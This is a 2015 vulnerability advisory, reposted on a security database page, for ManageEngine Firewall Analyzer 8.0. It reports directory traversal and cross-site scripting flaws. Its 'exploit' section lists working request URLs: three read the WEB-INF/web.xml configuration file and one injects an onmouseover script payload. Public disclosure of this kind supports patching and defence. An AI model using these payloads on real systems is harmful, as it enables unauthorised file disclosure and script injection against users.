ManageEngine Firewall Analyzer 8.0 Directory Traversal / XSS

Published
Credit
Risk
2015.01.30
AmirHadi Yazdani (Sobhansys Co)
Medium
CWE
CVE
Local
Remote
CWE-79
CWE-22
N/A
No
Yes

################################################################################################
# #
# ...:::::ManageEngine Firewall Analyzer Directory Traversal/XSS Vulnerabilities::::.... #
# #############################################################################################


Sobhan System Network & Security Group (sobhansys)

-------------------------------------------------------
# Date: 2015-01-28
# Exploit Author: AmirHadi Yazdani (Sobhansys Co)
# Vendor Homepage: http://www.manageengine.com/products/firewall/
# Demo Link: http://demo.fwanalyzer.com/
#Affected version: <= Build Version : 8.0

About ManageEngine Firewall Analyzer (From Vendor Site) :

ManageEngine Firewall Analyzer is an agent less log analytics and configuration management software
that helps network administrators to centrally collect, archive, analyze
their security device logs and generate forensic reports out of it.
--------------------------------------------------------


I'M hadihadi From Virangar Security Team

special tnx to:MR.nosrati,black.shadowes,MR.hesy
& all virangar members & all hackerz

greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei

spl:Z.Khodaee

-------
exploit:

Diretory Traversal :

http://127.0.0.1/fw/mindex.do?url=./WEB-INF/web.xml%3f
http://127.0.0.1/fw/index2.do?completeData=true&helpP=archiveAction&tab=system&url=./WEB-INF/web.xml%3f
http://127.0.0.1/fw/index2.do?helpP=fim&link=0&sel=13&tab=system&url=./WEB-INF/web.xml%3f

XSS :

http://127.0.0.1/fw/index2.do?completeData=true&url=importedLogDetails" onmouseover%3dprompt(902321) bad%3d"

----
Sobhan system Co.
Signal Network And Security Group (www.signal-net.net)

E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com